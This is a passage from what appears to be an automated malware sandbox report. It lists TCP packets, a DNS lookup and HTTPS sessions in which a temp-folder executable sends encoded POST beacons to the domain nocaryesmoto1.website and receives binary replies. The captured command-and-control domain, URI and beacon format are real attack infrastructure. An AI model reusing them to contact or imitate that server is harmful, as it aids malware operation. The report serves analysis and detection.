Oct 19, 2024 19:54:02.191257000 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.191344023 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.191380024 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.751266956 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.751307011 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.751353025 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.751431942 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.751442909 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.751457930 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.751463890 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.819026947 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.819046974 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.819102049 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.819405079 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.819415092 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.444920063 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.444982052 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.446070910 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.446080923 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.446300983 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.446985006 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.447006941 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.447012901 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.870146990 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.870182991 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.870249033 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.870318890 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.870338917 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.870348930 CEST	49769	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.870353937 CEST	443	49769	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.925843000 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.925888062 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:03.926017046 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.926270962 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:03.926297903 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.528568029 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.528747082 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.530198097 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.530225992 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.530436993 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.531090021 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.531131983 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.531141996 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.917886019 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.917923927 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.918051958 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.918354988 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.918376923 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.918442011 CEST	49775	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.918457985 CEST	443	49775	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.955966949 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.956002951 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:04.956079006 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.956330061 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:04.956345081 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:05.585638046 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:05.585726023 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:05.693802118 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:05.693814993 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:05.694048882 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:05.700604916 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:05.700639009 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:05.700670004 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.104619026 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.104655981 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.104715109 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.104823112 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.104844093 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.104856968 CEST	49781	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.104862928 CEST	443	49781	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.332863092 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.332916021 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.333007097 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.333271980 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.333287001 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.960750103 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.960830927 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.962049961 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.962063074 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.962383032 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.965977907 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.966201067 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.966238022 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.966335058 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.966373920 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.966496944 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.966564894 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:06.966630936 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:06.966648102 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:07.794807911 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:07.794867039 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:07.794976950 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:07.795203924 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:07.795213938 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:07.795222998 CEST	49787	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:07.795228004 CEST	443	49787	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:07.830591917 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:07.830692053 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:07.830770016 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:07.831023932 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:07.831054926 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.455562115 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.455646038 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.456751108 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.456779003 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.457112074 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.457772017 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.457814932 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.457868099 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.850019932 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.850074053 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.850169897 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.850228071 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.850260973 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:08.850287914 CEST	49798	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:08.850303888 CEST	443	49798	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:35.221565008 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.221597910 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:35.221672058 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.222414970 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.222429991 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:35.850641966 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:35.850709915 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.851912975 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.851923943 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:35.852122068 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:35.895241976 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.895263910 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:35.895323038 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:36.337596893 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:36.337636948 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:36.337835073 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:36.337872028 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:36.337872028 CEST	49946	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:36.337893009 CEST	443	49946	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:36.337904930 CEST	443	49946	188.114.97.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 19, 2024 19:53:57.416600943 CEST	58862	53	192.168.2.4	1.1.1.1
Oct 19, 2024 19:53:57.436222076 CEST	53	58862	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 19, 2024 19:53:57.416600943 CEST	192.168.2.4	1.1.1.1	0xd02c	Standard query (0)	nocaryesmoto1.website	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 19, 2024 19:53:57.436222076 CEST	1.1.1.1	192.168.2.4	0xd02c	No error (0)	nocaryesmoto1.website		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 19, 2024 19:53:57.436222076 CEST	1.1.1.1	192.168.2.4	0xd02c	No error (0)	nocaryesmoto1.website		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nocaryesmoto1.website

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:53:58 UTC	351	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Content-Length: 96 Host: nocaryesmoto1.website
2024-10-19 17:53:58 UTC	96	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 2d 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-10-19 17:53:58 UTC	809	IN	HTTP/1.1 200 OK Date: Sat, 19 Oct 2024 17:53:58 GMT Transfer-Encoding: chunked Connection: close rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDLbBVNsObnNrfIolfVkXTAtflMmS5%2BekZ1k9%2BCmmWx58auPgrvY92NX3KnLlmF43RmIufZJNOWXP%2FKgYZ0VXVQ5Fo6Z1jjvYGWyFQmSekXmKOP5wXCgGsyedNl42dxSS1KFvn5zvZQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a172aee8e9a9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1083&delivery_rate=1693567&cwnd=251&unsent_bytes=0&cid=528794577354872e&ts=503&x=0"
2024-10-19 17:53:58 UTC	560	IN	Data Raw: 33 37 64 36 0d 0a 93 55 00 00 49 03 4b 04 00 00 00 00 00 00 00 00 11 0f b4 08 0e 00 04 00 ce 11 0f ce 0b 1d 14 f3 04 8d e1 a9 2e e8 5c 53 79 ea 1e 0e 63 08 12 00 08 00 c6 1e 0e c6 0b 1d 14 aa 08 8d 6e 94 8f c5 79 09 3a ba e5 c7 53 c9 f5 42 01 ab 0f 04 4d 08 12 00 09 00 c8 0f 04 c8 0b 1d 14 d0 08 8d 1a 26 61 91 c4 20 39 49 ee c2 ce d2 d6 c0 54 c0 cc a8 06 90 0d 12 00 25 00 c8 a8 06 c8 0b 1d 14 9a 08 8d 1a 26 61 91 c4 20 39 49 c4 e0 e8 b0 a6 da d4 ae 8e a8 b0 9a d4 da b6 84 da d0 c2 ee b0 d0 d6 ce ca d0 8a e8 e8 80 ca e0 ca 54 da d4 da 81 06 4e 03 12 00 08 00 c8 81 06 c8 0b 1d 14 dc 08 8d 1a 26 61 91 c4 20 39 49 ee c2 e0 e0 da d4 c6 ee 0a 02 4c 09 12 00 10 00 c8 0a 02 c8 0b 1d 14 c0 08 8d 1a 26 61 91 c4 20 39 49 42 8e a2 ac ac 82 94 a0 b6 84 96 90 80 82 ac Data Ascii: 37d6UIK.\Sycny:SBM&a 9IT%&a 9ITN&a 9IL&a 9IB
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 85 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 92 8a 94 9a 84 82 ae a0 5c b2 05 7a 0a 12 00 09 00 c8 b2 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 92 8a 94 9a 84 82 ae a0 5c 03 01 65 0d 0e 00 04 00 ce 03 01 ce 0b 1d 14 c0 04 8d 61 84 8d 4d cc 7f 26 4e 6c 0a 80 09 12 00 08 00 c8 6c 0a c8 0b 1d 14 d0 08 8d 1a 26 61 91 c4 20 39 49 e8 ec d6 c4 da d0 c2 ee df 01 74 00 12 00 1f 00 c8 df 01 c8 0b 1d 14 9a 08 8d 1a 26 61 91 c4 20 39 49 c4 e0 e8 b0 84 da d0 c2 bc da d0 d0 ca b0 ec c2 ce c2 d4 e0 ee c2 ec e4 c2 ec ee 54 f8 d2 d0 76 0b a3 0d 12 00 11 00 c8 76 0b c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee b4 0e 6c 09 12 00 0b 00 c8 b4 0e c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e4 d4 ce ee c2 ec e4 c2 Data Ascii: &a 9I\z&a 9I\eaM&Nll&a 9It&a 9ITvv&a 9Il&a 9I
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 20 39 49 9a d4 da 84 da d0 c2 ae 00 dd 0a 12 00 06 00 c8 ae 00 c8 0b 1d 14 06 08 8d 1a 26 61 91 c4 20 39 49 5c 54 d6 e4 e8 d4 29 06 ec 0b 12 00 17 00 c8 29 06 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 e6 ca d0 d0 c2 e0 ee b0 8e d6 da d4 d6 d2 da b0 e6 ca d0 d0 c2 e0 ee 15 0b d7 01 12 00 11 00 c8 15 0b c8 0b 1d 14 c0 08 8d 1a 26 61 91 c4 20 39 49 4c c2 d4 ce ec fa e8 e0 c2 c0 b6 de c2 fa 4c 7c 4c 60 03 54 03 0e 00 04 00 ce 60 03 ce 0b 1d 14 f3 04 8d 99 22 e8 bb 24 3d 4a bc b4 05 85 0f 12 00 11 00 c8 b4 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee 7c 09 f3 0a 0e 00 04 00 ce 7c 09 ce 0b 1d 14 06 04 8d ff 19 f1 86 42 06 53 81 57 04 27 08 0e 00 04 00 ce 57 04 ce 0b 1d 14 f3 04 8d ec 35 0b d9 51 2e a9 de Data Ascii: 9I&a 9I\T))&a 9I&a 9ILL\|L`T`"$=J&a 9I\|\|BSW'W5Q.
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 04 c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 ae 96 84 a0 a6 8a ac 82 b0 a0 da c6 c2 ec a4 94 8e 53 0e 48 0a 12 00 1a 00 c8 53 0e c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e4 d4 ce b0 ac c2 ca d0 a4 94 8e b0 ce d0 da c2 d4 e0 b0 8a e8 e8 80 ca e0 ca a2 0c 73 00 12 00 08 00 c6 a2 0c c6 0b 1d 14 d0 08 8d 3a 74 50 f0 17 14 ad d7 b3 27 8c fc 9b 5f 96 c6 59 07 cc 08 0e 00 04 00 ce 59 07 ce 0b 1d 14 f3 04 8d c5 25 ee 58 78 3e 4c 5f bd 08 d4 0a 0e 00 04 00 ce bd 08 ce 0b 1d 14 aa 04 8d 35 f1 51 9b 98 cd f3 9c 28 04 fe 0c 0e 00 04 00 ce 28 04 ce 0b 1d 14 c0 04 8d 1b a0 37 44 1c 7b 2a 56 88 02 4e 08 12 00 09 00 c8 88 02 c8 0b 1d 14 c0 08 8d 1a 26 61 91 c4 20 39 49 42 80 c2 ee de e0 d6 e8 42 24 04 c4 07 0e 00 04 00 ce 24 04 ce 0b 1d 14 f3 04 8d 58 62 b4 1d e5 Data Ascii: &a 9ISHS&a 9Is:tP'_YY%Xx>L_5Q((7D{*VN&a 9IBB$$Xb
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 04 8d be fa 35 9e a3 67 96 99 c9 0c 2f 0f 12 00 06 00 c8 c9 0c c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 ce d6 d4 c4 da c6 ac 05 0a 0f 12 00 1a 00 c8 ac 05 c8 0b 1d 14 9a 08 8d 1a 26 61 91 c4 20 39 49 a8 ec d6 c6 ec ca d2 ee b0 a6 da d4 ae 8e a8 b0 a6 da d4 ae 8e a8 54 da d4 da 93 02 69 01 12 00 06 00 c8 93 02 c8 0b 1d 14 0e 08 8d 1a 26 61 91 c4 20 39 49 ce d6 d4 c4 da c6 bc 0b 4d 0f 12 00 08 00 c6 bc 0b c6 0b 1d 14 9d 08 8d 59 70 1f 21 86 ea ca fc d3 23 c3 2d 0a a1 f1 ed e8 0c 71 04 0e 00 04 00 ce e8 0c ce 0b 1d 14 f3 04 8d a0 99 65 75 1d 63 32 77 67 05 10 06 12 00 11 00 c8 67 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee e0 06 92 08 12 00 07 00 c8 e0 06 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 Data Ascii: 5g/&a 9I&a 9ITi&a 9IMYp!#-qeuc2wgg&a 9I&a 9I
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 61 91 c4 20 39 49 ce d6 d6 de da c2 ee 54 ee ea d0 da e0 c2 01 0e 32 08 0e 00 04 00 ce 01 0e ce 0b 1d 14 9d 04 8d 5e 1a 75 1a e3 e0 22 18 47 08 43 07 12 00 04 00 c8 47 08 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 5c 54 c0 cc 92 02 84 0a 12 00 08 00 c6 92 02 c6 0b 1d 14 9d 08 8d 57 e8 5a 5e 44 3b c8 39 de bb 86 52 c8 70 f3 28 4a 04 5b 03 12 00 0e 00 c8 4a 04 c8 0b 1d 14 d0 08 8d 1a 26 61 91 c4 20 39 49 c6 c2 ce de d6 b6 cc ec d6 e6 ee c2 ec ee 9c 0f f2 0c 12 00 11 00 c8 9c 0f c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee 96 03 a7 0a 0e 00 04 00 ce 96 03 ce 0b 1d 14 f3 04 8d 88 9e 42 1c 35 85 e0 1b e3 03 60 0e 12 00 07 00 c8 e3 03 c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e8 ec da e4 ca e0 c2 a5 09 fc Data Ascii: a 9IT2^u"GCG&a 9I\TWZ^D;9Rp(J[J&a 9I&a 9IB5`&a 9I
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 1a 26 61 91 c4 20 39 49 ae d6 c4 e0 e6 ca ec c2 b0 d2 d6 d4 c2 ec d6 52 e8 ec d6 dc c2 ce e0 b0 d2 d6 d4 c2 ec d6 52 ce d6 ec c2 e1 07 67 08 12 00 1f 00 c8 e1 07 c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e4 d4 ce b0 ac c2 ca d0 a4 94 8e b0 ee c2 ec e4 c2 ec b0 90 d6 ce ca d0 8a e8 e8 80 ca e0 ca b5 0c 4b 01 12 00 0e 00 c8 b5 0c c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 e6 ca d0 d0 c2 e0 ee b0 8a ec d2 d6 ec fa 21 0f f8 07 12 00 11 00 c8 21 0f c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 ae 96 84 a0 a6 8a ac 82 b0 a0 da c6 d8 e0 a4 94 8e 65 0e 47 05 12 00 08 00 c6 65 0e c6 0b 1d 14 aa 08 8d c9 62 d3 88 06 40 14 91 43 31 0f 84 8a 0b 2f 80 c4 0c 63 0a 0e 00 04 00 ce c4 0c ce 0b 1d 14 f3 04 8d 11 61 cc a6 ac 7a 6e a1 08 02 3a 06 0e 00 04 00 ce 08 02 ce Data Ascii: &a 9IRRg&a 9IK&a 9I!!&a 9IeGeb@C1/cazn:
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 93 86 ba 06 5c 03 12 00 08 00 c8 ba 06 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 e8 ec d6 c4 da d0 c2 ee 8e 0c a4 0a 12 00 08 00 c6 8e 0c c6 0b 1d 14 9a 08 8d 0d 26 ca ac ce 2b 91 ec 86 75 16 a0 42 60 aa fd ee 04 b9 08 12 00 19 00 c8 ee 04 c8 0b 1d 14 dc 08 8d 1a 26 61 91 c4 20 39 49 d2 c2 ee ee c2 d4 c6 c2 ec ee b0 80 da ee ce d6 ec c0 b0 ae e0 ca cc d0 c2 0a 0c 92 01 12 00 07 00 c8 0a 0c c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 8e a2 ac ac 82 94 a0 ac 08 93 0e 12 00 12 00 c8 ac 08 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 ca ec d2 d6 ec fa 5c e6 ca d0 d0 c2 e0 54 d0 d2 c0 cc 1e 06 8a 02 12 00 0b 00 c8 1e 06 c8 0b 1d 14 06 08 8d 1a 26 61 91 c4 20 39 49 e4 e8 d4 b0 96 e8 c2 d4 a4 a8 94 ed 0d 8e 05 0e 00 04 00 ce ed 0d ce 0b 1d 14 06 04 8d e6 90 Data Ascii: \&a 9I&+uB`&a 9I&a 9I&a 9I\T&a 9I
2024-10-19 17:53:58 UTC	1369	IN	Data Raw: 8e d6 d6 de da c2 ee 57 0d 89 06 0e 00 04 00 ce 57 0d ce 0b 1d 14 06 04 8d 05 86 75 99 b8 99 d7 9e 2b 0f 25 04 0e 00 04 00 ce 2b 0f ce 0b 1d 14 f3 04 8d 6f df 53 6a d3 c4 f1 6d 41 08 de 09 12 00 08 00 c6 41 08 c6 0b 1d 14 aa 08 8d ad a2 fc 56 18 69 51 5c 26 f1 20 5a 94 22 6a 4d d6 00 9e 00 12 00 0f 00 c8 d6 00 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 8e d6 da d4 d6 d2 da b0 8e d6 da d4 d6 d2 da 71 01 53 08 12 00 0d 00 c8 71 01 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 ca ec d2 d6 ec fa 5c e6 ca d0 d0 c2 e0 ad 0d 6f 0e 0e 00 04 00 ce ad 0d ce 0b 1d 14 aa 04 8d 71 fe b3 99 44 f6 11 9e f9 0a 95 00 0e 00 04 00 ce f9 0a ce 0b 1d 14 f3 04 8d 5e 7c 3f b8 e3 86 68 ba ba 0e e7 09 12 00 0e 00 c8 ba 0e c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 92 d6 d4 c2 Data Ascii: WWu+%+oSjmAAViQ\& Z"jM&a 9IqSq&a 9I\oqD^\|?h&a 9I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49747	188.114.97.3	443	7224	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:53:59 UTC	426	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 208 Host: nocaryesmoto1.website
